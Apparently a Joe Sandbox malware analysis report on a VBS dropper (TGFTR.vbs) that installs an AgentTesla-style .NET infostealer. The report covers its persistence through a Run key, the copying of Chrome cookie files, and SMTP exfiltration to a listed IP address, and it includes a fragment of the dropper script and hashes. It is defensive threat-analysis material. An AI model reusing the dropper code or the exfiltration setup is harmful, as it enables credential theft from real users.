                                                      http://www.jiyu-kobo.co.jp/Y0/anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn9anyname.exe, 00000001.00000003.302877241.0000000005372000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.comldanyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.fontbureau.comoanyname.exe, 00000001.00000002.342505137.000000000538A000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.336787753.0000000005387000.00000004.00000001.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.jiyu-kobo.co.jp/%7anyname.exe, 00000001.00000003.304121443.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304034173.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304002699.000000000538D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.303924115.0000000005392000.00000004.00000001.sdmpfalse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.fontbureau.com/designers8anyname.exe, 00000001.00000002.342544948.0000000006582000.00000004.00000001.sdmpfalse
                                                        		high
                                                        http://www.jiyu-kobo.co.jp/janyname.exe, 00000001.00000003.305479835.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304640191.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304813720.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304505516.0000000005383000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305305998.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304726542.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304198095.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304778818.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304935196.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304527460.000000000538C000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304377221.000000000537D000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305193401.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304864654.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305379502.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304993341.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305244460.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304187285.0000000005391000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305125471.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304449883.0000000005381000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.305058733.0000000005393000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.304310308.0000000005393000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.comalicanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.comgrita=anyname.exe, 00000001.00000003.306125466.0000000005380000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		low
                                                        http://www.fontbureau.comitudanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307047335.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307012712.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307071537.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                                        • URL Reputation: safe
                                                        		unknown
                                                        http://www.fontbureau.comFjanyname.exe, 00000001.00000003.307218412.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307110201.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307170119.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307135343.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307270002.0000000005385000.00000004.00000001.sdmp, anyname.exe, 00000001.00000003.307193624.0000000005385000.00000004.00000001.sdmpfalse
                                                        • Avira URL Cloud: safe
                                                        		unknown

                                                        Contacted IPs

                                                        • No. of IPs < 25%
                                                        • 25% < No. of IPs < 50%
                                                        • 50% < No. of IPs < 75%
                                                        • 75% < No. of IPs

                                                        Public

                                                        IPDomainCountryFlagASNASN NameMalicious
                                                        162.241.148.206
                                                        		mail.gnvmetalica.peUnited States
                                                        		46606UNIFIEDLAYER-AS-1USfalse

                                                        General Information

                                                        Joe Sandbox Version:34.0.0 Boulder Opal
                                                        Analysis ID:546894
                                                        Start date:01.01.2022
                                                        Start time:09:09:08
                                                        Joe Sandbox Product:CloudBasic
                                                        Overall analysis duration:0h 15m 52s
                                                        Hypervisor based Inspection enabled:false
                                                        Report type:full
                                                        Sample file name:TGFTR.vbs
                                                        Cookbook file name:default.jbs
                                                        Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                        Number of analysed new started processes analysed:27
                                                        Number of new started drivers analysed:0
                                                        Number of existing processes analysed:0
                                                        Number of existing drivers analysed:0
                                                        Number of injected processes analysed:0
                                                        Technologies:
                                                        • HCA enabled
                                                        • EGA enabled
                                                        • HDC enabled
                                                        • AMSI enabled
                                                        Analysis Mode:default
                                                        Analysis stop reason:Timeout
                                                        Detection:MAL
                                                        Classification:mal100.troj.spyw.evad.winVBS@17/7@4/1
                                                        EGA Information:Failed
                                                        HDC Information:Failed
                                                        HCA Information:
                                                        • Successful, ratio: 92%
                                                        • Number of executed functions: 76
                                                        • Number of non-executed functions: 2
                                                        Cookbook Comments:
                                                        • Adjust boot time
                                                        • Enable AMSI
                                                        • Found application associated with file extension: .vbs
                                                        • Override analysis time to 240s for JS/VBS files not yet terminated
                                                        Warnings:
                                                        Show All
                                                        • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
                                                        • Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, fs.microsoft.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, arc.msn.com
                                                        • Not all processes where analyzed, report is missing behavior information
                                                        • Report creation exceeded maximum time and may have missing disassembly code information.
                                                        • Report size exceeded maximum capacity and may have missing behavior information.
                                                        • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                                        Simulations

                                                        Behavior and APIs

                                                        TimeTypeDescription
                                                        09:10:16API Interceptor1466x Sleep call for process: anyname.exe modified
                                                        09:10:46AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrO C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        09:10:54AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run jNnIJrO C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        09:10:58API Interceptor1134x Sleep call for process: jNnIJrO.exe modified

                                                        Joe Sandbox View / Context

                                                        IPs

                                                        No context

                                                        Domains

                                                        No context

                                                        ASN

                                                        No context

                                                        JA3 Fingerprints

                                                        No context

                                                        Dropped Files

                                                        No context

                                                        Created / dropped Files

                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\anyname.exe.log
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.355304211458859
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\jNnIJrO.exe.log
                                                        Process:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):1216
                                                        Entropy (8bit):5.355304211458859
                                                        Encrypted:false
                                                        SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                        MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                        SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                        SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                        SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                        C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        Process:C:\Windows\System32\wscript.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):717312
                                                        Entropy (8bit):7.959376773159308
                                                        Encrypted:false
                                                        SSDEEP:12288:DcINzCw+zPdt+3PCwhJ9csQ6JX4nwTTDi4BE9fyi39/r5l:DcIBh+2/PlQ6JfTTHBHi31Vl
                                                        MD5:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        SHA1:FCA9C04357B67E9091E0269FB9E693485305A36F
                                                        SHA-256:79A1E2CD90F125EE008CF283B3BFBDE3EFE31D3291812A2E18194680B5C77AF4
                                                        SHA-512:03EC06F3994771D0A810816EF25B9B95A0983EEDA67C61A59F9AFBCDC437EDA85E517F17C5972824354394AF31E8CBF588243CF080E1FFBD82526ACF8996AAD1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Reputation:unknown
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........V...Z...............U...........................................0...........(...."...@s....}.....(...."...@s....}.....(....s....}.....(....s....}.....(....s....}.....s....}.....s....}......}.....(........}......}......}.....(.....*.0..S.........s....}.....{...........s....o......{...........s....o......{.....o........(.....*...{.....o......{.....o......{....o......{.....o ....*..*&...}....*:..{....oa....*....0..,.........{.........,...{....o!......{.........,...*.0..
                                                        C:\Users\user\AppData\Local\Temp\tmpG259.tmp (copy)
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):717312
                                                        Entropy (8bit):7.959376773159308
                                                        Encrypted:false
                                                        SSDEEP:12288:DcINzCw+zPdt+3PCwhJ9csQ6JX4nwTTDi4BE9fyi39/r5l:DcIBh+2/PlQ6JfTTHBHi31Vl
                                                        MD5:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        SHA1:FCA9C04357B67E9091E0269FB9E693485305A36F
                                                        SHA-256:79A1E2CD90F125EE008CF283B3BFBDE3EFE31D3291812A2E18194680B5C77AF4
                                                        SHA-512:03EC06F3994771D0A810816EF25B9B95A0983EEDA67C61A59F9AFBCDC437EDA85E517F17C5972824354394AF31E8CBF588243CF080E1FFBD82526ACF8996AAD1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Reputation:unknown
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........V...Z...............U...........................................0...........(...."...@s....}.....(...."...@s....}.....(....s....}.....(....s....}.....(....s....}.....s....}.....s....}......}.....(........}......}......}.....(.....*.0..S.........s....}.....{...........s....o......{...........s....o......{.....o........(.....*...{.....o......{.....o......{....o......{.....o ....*..*&...}....*:..{....oa....*....0..,.........{.........,...{....o!......{.........,...*.0..
                                                        C:\Users\user\AppData\Roaming\11x25noc.qgj\Chrome\Default\Cookies
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.6970840431455908
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                        C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        Process:C:\Users\user\AppData\Local\Temp\anyname.exe
                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                        Category:dropped
                                                        Size (bytes):717312
                                                        Entropy (8bit):7.959376773159308
                                                        Encrypted:false
                                                        SSDEEP:12288:DcINzCw+zPdt+3PCwhJ9csQ6JX4nwTTDi4BE9fyi39/r5l:DcIBh+2/PlQ6JfTTHBHi31Vl
                                                        MD5:9AC2AB7CA14ACC134AEFDF731DED674B
                                                        SHA1:FCA9C04357B67E9091E0269FB9E693485305A36F
                                                        SHA-256:79A1E2CD90F125EE008CF283B3BFBDE3EFE31D3291812A2E18194680B5C77AF4
                                                        SHA-512:03EC06F3994771D0A810816EF25B9B95A0983EEDA67C61A59F9AFBCDC437EDA85E517F17C5972824354394AF31E8CBF588243CF080E1FFBD82526ACF8996AAD1
                                                        Malicious:true
                                                        Antivirus:
                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                        • Antivirus: ReversingLabs, Detection: 32%
                                                        Reputation:unknown
                                                        Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0.................. ... ....@.. .......................`............@.....................................O.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H........V...Z...............U...........................................0...........(...."...@s....}.....(...."...@s....}.....(....s....}.....(....s....}.....(....s....}.....s....}.....s....}......}.....(........}......}......}.....(.....*.0..S.........s....}.....{...........s....o......{...........s....o......{.....o........(.....*...{.....o......{.....o......{....o......{.....o ....*..*&...}....*:..{....oa....*....0..,.........{.........,...{....o!......{.........,...*.0..
                                                        C:\Users\user\AppData\Roaming\mp0cbpec.t0r\Chrome\Default\Cookies
                                                        Process:C:\Users\user\AppData\Roaming\jNnIJrO\jNnIJrO.exe
                                                        File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                        Category:dropped
                                                        Size (bytes):20480
                                                        Entropy (8bit):0.6970840431455908
                                                        Encrypted:false
                                                        SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                        MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                        SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                        SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                        SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                        Malicious:false
                                                        Reputation:unknown
                                                        Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                        Static File Info

                                                        General

                                                        File type:ASCII text, with very long lines, with CRLF line terminators
                                                        Entropy (8bit):5.990695300026366
                                                        TrID:
                                                        • Visual Basic Script (13500/0) 100.00%
                                                        File name:TGFTR.vbs
                                                        File size:956955
                                                        MD5:49d19f0ce5da944d1423d3f189b22103
                                                        SHA1:305fbc7a46a028c4354f13a417ba46f67464ebab
                                                        SHA256:ac0517947c0be7baad44fb8f054215c00ada03bb61772bab9eb52e48a9c3a097
                                                        SHA512:3a704970dcd520d1faee08cca897d30c23f89de5d45242066d96fa16f4ba5ee1a8c5bb82163e1896c70f95f58a7e845af403681f0432a9945f1812779dd4675b
                                                        SSDEEP:12288:A7qHO9HgZYIUSgCPCNieCCXmiFY8qGHy7gzaBUQgngZEDlc+mb/PM4w:AaO9ANUSgCPeHCCXtqGDkTggZOlBk7w
                                                        File Content Preview:on error resume next..dim medo,sea,medoff..dim maasr..set helper = createobject("Wscript.Shell")..maasr = helper.ExpandEnvironmentStrings("%temp%")..set medo = CreateObject("Msxml2.DOMDocument.3.0").CreateElement("base64")..medo.dataType="bin.base64"..med

                                                        File Icon

                                                        Icon Hash:e8d69ece869a9ec4

                                                        Network Behavior

                                                        Snort IDS Alerts

                                                        TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                        01/01/22-09:12:05.421047TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49799587192.168.2.3162.241.148.206
                                                        01/01/22-09:12:08.540772TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49800587192.168.2.3162.241.148.206
                                                        01/01/22-09:13:01.940135TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49803587192.168.2.3162.241.148.206
                                                        01/01/22-09:13:05.724118TCP2030171ET TROJAN AgentTesla Exfil Via SMTP49804587192.168.2.3162.241.148.206

                                                        Network Port Distribution

                                                        TCP Packets

                                                        TimestampSource PortDest PortSource IPDest IP
                                                        Jan 1, 2022 09:12:03.607444048 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:03.748084068 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:03.748193979 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:04.450804949 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:04.451267004 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:04.592031002 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:04.595851898 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:04.736983061 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:04.737663984 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:04.918613911 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:04.945499897 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:04.946636915 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.087377071 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.087737083 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.269418001 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.278330088 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.278609991 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.419640064 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.419703960 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.421046972 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.421148062 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.421993971 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.422091961 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:05.561997890 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.562351942 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.562927961 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:05.616802931 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.110874891 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.252335072 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:07.252568960 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.252804995 CET49799587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.308780909 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.393135071 CET58749799162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:07.450454950 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:07.450628042 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.643258095 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:07.643572092 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.784706116 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:07.785276890 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:07.927659988 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:07.928175926 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.073498011 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.073766947 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.214665890 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.214996099 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.396425962 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.396507978 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.396923065 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.537779093 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.537833929 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.540518045 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.540771961 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.540971041 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.541203976 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.541496992 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.541662931 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.541812897 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.541980982 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:12:08.689071894 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.689133883 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.689251900 CET58749800162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:12:08.732492924 CET49800587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:00.623840094 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:00.762836933 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:00.763016939 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:00.958172083 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:00.958606958 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.124368906 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.124885082 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.264482021 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.264997005 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.444714069 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.472667933 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.473191023 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.612147093 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.612683058 CET49803587192.168.2.3162.241.148.206
                                                        Jan 1, 2022 09:13:01.792792082 CET58749803162.241.148.206192.168.2.3
                                                        Jan 1, 2022 09:13:01.796439886 CET58749803162.241.148.206192.168.2.3
